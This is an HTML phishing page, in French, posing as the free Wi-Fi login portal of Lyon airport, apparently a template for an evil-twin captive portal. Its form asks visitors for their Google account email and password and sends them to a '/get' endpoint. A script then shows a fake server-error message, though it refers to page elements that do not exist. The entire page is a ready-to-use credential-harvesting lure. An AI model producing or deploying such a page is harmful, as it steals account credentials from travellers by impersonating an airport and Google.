<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300px" height="163px" viewBox="0 0 300 163" version="1.1">
<g id="surface1">
<rect x="0" y="0" width="300" height="163" style="fill:rgb(100%,100%,100%);fill-opacity:1;stroke:none;"/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 30.195312 138.15625 L 26.273438 128.535156 L 22.136719 138.15625 Z M 23.449219 115.867188 L 29.117188 115.867188 L 44.804688 151.21875 L 34.785156 151.21875 L 32.390625 145.324219 L 19.726562 145.324219 L 17.332031 151.21875 L 7.527344 151.21875 L 23.449219 115.867188 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 48.078125 115.867188 L 73.566406 115.867188 L 73.566406 124.175781 L 57.683594 124.175781 L 57.683594 129.300781 L 71.644531 129.300781 L 71.644531 137.371094 L 57.683594 137.371094 L 57.683594 142.832031 L 73.824219 142.832031 L 73.824219 151.136719 L 48.078125 151.136719 L 48.078125 115.867188 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 93.882812 134.210938 C 96.691406 134.453125 99.191406 132.433594 99.546875 129.632812 L 99.546875 129.300781 C 99.605469 127.90625 99.097656 126.550781 98.132812 125.542969 C 97.171875 124.535156 95.84375 123.960938 94.449219 123.957031 L 89.292969 123.957031 L 89.292969 134.210938 Z M 91.273438 142.300781 L 89.3125 142.300781 L 89.3125 151.257812 L 79.921875 151.257812 L 79.921875 115.90625 L 94.765625 115.90625 C 103.921875 115.90625 109.15625 121.582031 109.15625 129.242188 C 109.164062 133.875 106.539062 138.109375 102.390625 140.160156 L 101.507812 140.59375 C 103.21875 141.820312 105.289062 142.4375 107.390625 142.339844 L 107.390625 151.945312 C 100.601562 152.175781 94.296875 148.421875 91.253906 142.339844 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 141.214844 133.5625 C 141.550781 128.621094 137.847656 124.335938 132.921875 123.957031 L 132.273438 123.957031 C 129.871094 123.921875 127.550781 124.847656 125.828125 126.527344 C 124.105469 128.207031 123.125 130.503906 123.097656 132.914062 L 123.097656 133.5625 C 122.898438 138.613281 126.78125 142.890625 131.824219 143.164062 L 132.273438 143.164062 C 137.316406 143.132812 141.398438 139.046875 141.429688 133.992188 C 141.214844 133.777344 141.214844 133.777344 141.214844 133.5625 Z M 113.078125 133.5625 C 113.035156 123.496094 121.128906 115.296875 131.175781 115.21875 L 132.039062 115.21875 C 136.820312 114.980469 141.496094 116.667969 145.023438 119.910156 C 148.546875 123.152344 150.628906 127.671875 150.804688 132.460938 L 150.804688 133.5625 C 150.914062 138.386719 149.078125 143.050781 145.714844 146.5 C 142.347656 149.953125 137.738281 151.898438 132.921875 151.902344 L 131.824219 151.902344 C 126.964844 152.089844 122.234375 150.328125 118.675781 147.011719 C 115.117188 143.695312 113.023438 139.09375 112.863281 134.230469 C 113.027344 134.058594 113.109375 133.820312 113.078125 133.582031 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 169.546875 133.992188 C 173.921875 133.992188 175.429688 131.597656 175.429688 129.203125 C 175.429688 126.804688 173.683594 124.175781 169.546875 124.175781 L 165.84375 124.175781 L 165.84375 133.992188 Z M 156.46875 115.867188 L 170.195312 115.867188 C 179.351562 115.867188 185.019531 121.542969 185.019531 129.417969 C 185.019531 136.839844 179.351562 142.085938 169.765625 142.085938 L 165.84375 142.085938 L 165.84375 151.257812 L 156.46875 151.257812 L 156.46875 115.90625 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 216.019531 133.5625 C 216.355469 128.621094 212.652344 124.335938 207.726562 123.957031 L 207.078125 123.957031 C 204.671875 123.921875 202.355469 124.847656 200.632812 126.527344 C 198.910156 128.207031 197.925781 130.503906 197.902344 132.914062 L 197.902344 133.5625 C 197.691406 138.617188 201.582031 142.898438 206.625 143.164062 L 207.078125 143.164062 C 212.121094 143.132812 216.203125 139.046875 216.234375 133.992188 C 216.019531 133.777344 216.019531 133.777344 216.019531 133.5625 Z M 188.097656 133.5625 C 188.054688 123.488281 196.160156 115.285156 206.214844 115.21875 L 207.097656 115.21875 C 211.875 114.984375 216.546875 116.675781 220.066406 119.917969 C 223.589844 123.15625 225.667969 127.675781 225.84375 132.460938 L 225.84375 133.5625 C 225.953125 138.386719 224.117188 143.050781 220.753906 146.5 C 217.386719 149.953125 212.777344 151.898438 207.960938 151.902344 L 206.863281 151.902344 C 202.003906 152.089844 197.273438 150.328125 193.714844 147.011719 C 190.15625 143.695312 188.066406 139.09375 187.902344 134.230469 C 188.066406 134.058594 188.148438 133.820312 188.117188 133.582031 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 245.429688 134.210938 C 248.238281 134.453125 250.738281 132.433594 251.097656 129.632812 L 251.097656 129.300781 C 251.128906 127.9375 250.617188 126.617188 249.675781 125.632812 C 248.734375 124.648438 247.4375 124.082031 246.078125 124.058594 L 240.84375 124.058594 L 240.84375 134.308594 Z M 242.824219 142.300781 L 240.863281 142.300781 L 240.863281 151.257812 L 231.488281 151.257812 L 231.488281 115.90625 L 246.332031 115.90625 C 255.488281 115.90625 260.726562 121.582031 260.726562 129.242188 C 260.730469 133.875 258.109375 138.109375 253.960938 140.160156 L 253.078125 140.59375 C 254.785156 141.820312 256.859375 142.4375 258.960938 142.339844 L 258.960938 151.945312 C 252.167969 152.175781 245.867188 148.421875 242.824219 142.339844 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 274.234375 124.390625 L 262.902344 124.390625 L 262.902344 115.867188 L 295.175781 115.867188 L 295.175781 124.390625 L 283.605469 124.390625 L 283.605469 151.257812 L 274.019531 151.257812 L 274.234375 124.390625 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 8.605469 69.777344 L 18.410156 69.777344 L 18.410156 96.640625 L 34.097656 96.640625 L 34.097656 104.949219 L 8.605469 104.949219 L 8.605469 69.777344 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 42.410156 91.398438 L 29.746094 69.777344 L 41.3125 69.777344 L 47.625 82.011719 L 53.960938 69.777344 L 64.863281 69.777344 L 52 91.378906 L 52 105.125 L 42.390625 105.125 L 42.390625 91.378906 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 92.488281 87.46875 C 92.839844 82.535156 89.140625 78.242188 84.214844 77.867188 L 83.546875 77.867188 C 81.144531 77.832031 78.828125 78.753906 77.109375 80.4375 C 75.390625 82.117188 74.410156 84.414062 74.390625 86.820312 L 74.390625 87.46875 C 74.179688 92.527344 78.070312 96.816406 83.117188 97.09375 L 83.546875 97.09375 C 88.59375 97.0625 92.671875 92.972656 92.707031 87.921875 C 92.488281 87.6875 92.488281 87.6875 92.488281 87.46875 Z M 64.371094 87.46875 C 64.328125 77.40625 72.421875 69.203125 82.46875 69.128906 L 83.332031 69.128906 C 88.113281 68.894531 92.789062 70.585938 96.316406 73.832031 C 99.84375 77.074219 101.925781 81.597656 102.097656 86.390625 L 102.097656 87.46875 C 102.203125 92.292969 100.367188 96.957031 97.003906 100.410156 C 93.640625 103.863281 89.03125 105.816406 84.214844 105.832031 L 83.117188 105.832031 C 78.257812 106.011719 73.527344 104.25 69.96875 100.9375 C 66.40625 97.621094 64.308594 93.023438 64.136719 88.15625 C 64.316406 87.984375 64.402344 87.738281 64.371094 87.488281 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(13.72549%,30.196078%,57.647059%);fill-opacity:1;" d="M 117.214844 85.9375 L 117.214844 105.164062 L 107.84375 105.164062 L 107.84375 69.558594 L 113.078125 69.558594 L 130.960938 88.785156 L 130.960938 69.992188 L 140.546875 69.992188 L 140.546875 105.597656 L 135.3125 105.597656 L 117.214844 85.957031 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(89.803922%,12.156863%,20.784314%);fill-opacity:1;" d="M 66.410156 107.578125 L 66.410156 114.550781 L 54.644531 114.550781 L 66.410156 107.578125 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(89.803922%,12.156863%,20.784314%);fill-opacity:1;" d="M 41.980469 26.53125 C 41.980469 26.101562 42.195312 25.882812 42.195312 25.453125 C 42.625 24.136719 43.078125 22.820312 43.507812 21.289062 C 46.101562 14.695312 49.871094 8.625 54.625 3.378906 C 54.84375 3.160156 50.039062 5.125 43.292969 12.332031 C 30.863281 25.214844 32.15625 30.460938 28.902344 40.925781 C 27.351562 46.390625 24.921875 51.566406 21.707031 56.246094 C 30.125 49.882812 36.554688 41.242188 40.234375 31.34375 C 41.039062 29.828125 41.625 28.210938 41.980469 26.53125 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(89.803922%,12.156863%,20.784314%);fill-opacity:1;" d="M 8.175781 24.351562 C 14.640625 29.175781 21.960938 32.734375 29.746094 34.839844 C 30.183594 32.019531 31.070312 29.289062 32.371094 26.746094 C 29.960938 26.746094 27.566406 26.964844 24.527344 26.964844 C 18.964844 27.101562 13.421875 26.214844 8.175781 24.351562 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(89.803922%,12.156863%,20.784314%);fill-opacity:1;" d="M 55.058594 33.070312 C 50.992188 31.042969 46.761719 29.359375 42.410156 28.042969 C 41.546875 30.65625 40.664062 33.503906 39.585938 35.898438 L 47 35.898438 C 54 36.554688 60.8125 38.554688 67.058594 41.789062 C 63.285156 38.582031 59.273438 35.667969 55.058594 33.070312 "/>
</g>
</svg>

    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur le Wifi Gratuit LYON Aeroport.</h1>
            <h2 class='containersubtitle'> Connectez vous grace a votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
